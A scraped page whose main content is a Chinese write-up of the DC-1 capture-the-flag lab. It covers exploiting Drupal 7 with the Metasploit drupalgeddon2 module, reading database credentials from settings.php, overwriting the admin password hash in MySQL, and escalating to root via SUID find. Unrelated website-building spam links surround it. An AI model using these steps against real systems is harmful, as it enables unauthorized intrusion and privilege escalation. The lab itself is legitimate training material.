当前位置: 首页 > news >正文

赣州网站建设 赣州网页设计国企单位网站建设方案

赣州网站建设 赣州网页设计,国企单位网站建设方案,网站制作实例,网站建设搭建微商导航网站以前写过了#xff0c;有一些忘了#xff0c;快速的重温一遍。 DC一共九个靶场#xff0c;目标一天一个。 文章目录环境配置#xff1a;信息搜集#xff1a;漏洞复现#xff1a;FLAG获取环境配置#xff1a; 最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。 信…以前写过了有一些忘了快速的重温一遍。 DC一共九个靶场目标一天一个。 文章目录环境配置信息搜集漏洞复现FLAG获取环境配置 最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。 信息搜集 首先探测靶机ip两种方法 arp-scan -l nmap -sP 192.168.28.0/24靶机ip为192.168.28.129 明显有一个80端口继续用nmap探测端口情况。 还开起了22和111端口wappalyzer信息搜集看一下框架。 或者用kali自带的whatweb指纹探测。 whatweb -v 192.168.28.129同样得到的是Drupal7.0版本msfconsole里存在Drupal攻击模块。 漏洞复现 search去找Drupal模块 search Drupal进入exploit/unix/webapp/drupal_drupalgeddon2模块然后查看payload。 use exploit/unix/webapp/drupal_drupalgeddon2 show payloadsphp/meterpreter/reverse_tcp可以利用。 然后设置payload和配置。 set payload /php/meterpreter/reverse_tcp set RHOSTS 192.168.28.129输入exploit启动。 成功拿到shell先反弹shell。 python -c import pty;pty.spawn(/bin/bash)FLAG获取 然后ls -l发现flag1. Every good CMS needs a config file - and so do you 每个好的CMS都需要一个配置文件 - 你也是明显是想让我们去查看配置文件。 发现settings.php文件查看后得到flag2. Brute force and dictionary attacks arent the* only ways to gain access (and you WILL need access).* What can you do with these credentials? 蛮力和字典攻击不是*只有获得访问权限的方法您将需要访问权限。* 您可以使用这些凭据做什么不能爆破但在配置中存在mysql账号密码可以通过mysql查看账号密码。 mysql -udbuser -pR0ck3t登录mysql。 在其中找到user表。 但其中的pass被加密猜测存在哈希加密代码查找。 find . -name *hash*找到的password-hash.sh这肯定是加密代码cat一下。 #!/usr/bin/php ?php/*** Drupal hash script - to generate a hash from a plaintext password** Check for your PHP interpreter - on Windows youll probably have to* replace line 1 with* #!c:/program files/php/php.exe** param password1 [password2 [password3 ...]]* Plain-text passwords in quotes (or with spaces backslash escaped).*/if (version_compare(PHP_VERSION, 5.2.0, )) {$version PHP_VERSION;echo EOFERROR: This script requires at least PHP version 5.2.0. You invoked it withPHP version {$version}. \n EOF;exit; }$script basename(array_shift($_SERVER[argv]));if (in_array(--help, $_SERVER[argv]) || empty($_SERVER[argv])) {echo EOFGenerate Drupal password hashes from the shell.Usage: {$script} [OPTIONS] plan-text password Example: {$script} mynewpasswordAll arguments are long options.--help Print this page.--root pathSet the working directory for the script to the specified path.To execute this script this has to be the root directory of yourDrupal installation, e.g. /home/www/foo/drupal (assuming Drupalrunning on Unix). Use surrounding quotation marks on Windows.password1 [password2 [password3 ...]]One or more plan-text passwords enclosed by double quotes. Theoutput hash may be manually entered into the {users}.pass field tochange a password via SQL to a known value.To run this script without the --root argument invoke it from the root directory of your Drupal installation as./scripts/{$script} \n EOF;exit; }$passwords array();// Parse invocation arguments. while ($param array_shift($_SERVER[argv])) {switch ($param) {case --root:// Change the working directory.$path array_shift($_SERVER[argv]);if (is_dir($path)) {chdir($path);}break;default:// Add a password to the list to be processed.$passwords[] $param;break;} }define(DRUPAL_ROOT, getcwd());include_once DRUPAL_ROOT . /includes/password.inc; include_once DRUPAL_ROOT . /includes/bootstrap.inc;foreach ($passwords as $password) {print(\npassword: $password \t\thash: . user_hash_password($password) .\n); } print(\n);先看帮助理解脚本如何使用。 然后运行脚本然后得到加密过后密码随后密码替换。 update users set pass$S$Ds.RBZ79FgPXwUiHZZd5eo2rVbYQzTomLgBhA24Sw04Bnr3UWSpBwhere nameadmin;然后登录网站得到flag3 Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow. 特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取阴影中的东西。在/etc/passwd中发现flag4用户。 得到flag4。 Can you use this same method to find or access the flag in root?Probably. But perhaps its not that easy. Or maybe it is? 您可以使用相同的方法来查找或访问 root 中的标志吗 可能。但也许这并不容易。 或者也许是访问root文件夹需要root权限。 SUID提权: find / -user root -perm -4000 -print 2/dev/null其中就有find直接用。 find / -exec /bin/bash -p \;进入root目录得到最后的flag。 Well done!!!!Hopefully youve enjoyed this and learned some new skills.You can let me know what you thought of this little journey by contacting me via Twitter - DCAU7 干的好希望您喜欢这个并学到了一些新技能。你可以让我知道你对这个小旅程的看法 通过推特与我联系 - DCAU7利用hydra暴力破解得到flag4的密码。
http://www.hkea.cn/news/14281054/

相关文章:

  • 可以做视频片头的网站建设行业公司网站
  • 怎么建设局域网网站陇南比亚网站建设
  • 网站建设与管理教案怎么写wordpress代码块行号
  • 成都企业网站建设公司万网云服务器怎么上传网站
  • 怎么建小说网站使用vs2015做网站教程
  • 网站登录怎么做wordpress页面加载时间插件
  • 企业建网站分类信息网wordpress获取版权声明
  • 程序员和网站建设免费咨询英文
  • 徐州网站制作方法目前跨境电商平台有哪些
  • 做网站 服务器seo优化个人博客
  • 如何让网站 被百度k电商平台设计方案
  • 南昌微网站建设国际数据公司idc
  • 最安全的软件下载网站wordpress可以商用吗
  • 合肥网站建设q479185700強万博法务网站建设项目
  • 网站建设入门 下载wap网站多少钱
  • 宁波网站建设公司代理设计网站页面要多少钱
  • 企业网站推广属于付费推广吗网站开发哪种语言
  • 后台网站模板下载推广平台下载
  • 广东建设项目备案公示网站定制开发app商城系统
  • 网站网站是否需要备案建设银行公积金预约网站
  • 一般门户网站网页游戏排行榜前十推荐
  • 建设银行咸阳交费网站心馨人生珠海网站建设
  • 牡丹江建站天水建设银行网站
  • 建企业网站的步骤怎么跟客户介绍网站建设
  • 建设设计网站公司厦门软件开发工资一般多少
  • 浏览器打开宁波seo营销平台
  • 赣州网站建设培训wordpress 菜单 文章
  • 推进政务服务网站一体化建设建e网3d模型库
  • icp备案查看网站内容吗网站建设基础教程
  • 企业网站色彩沛县专业做网站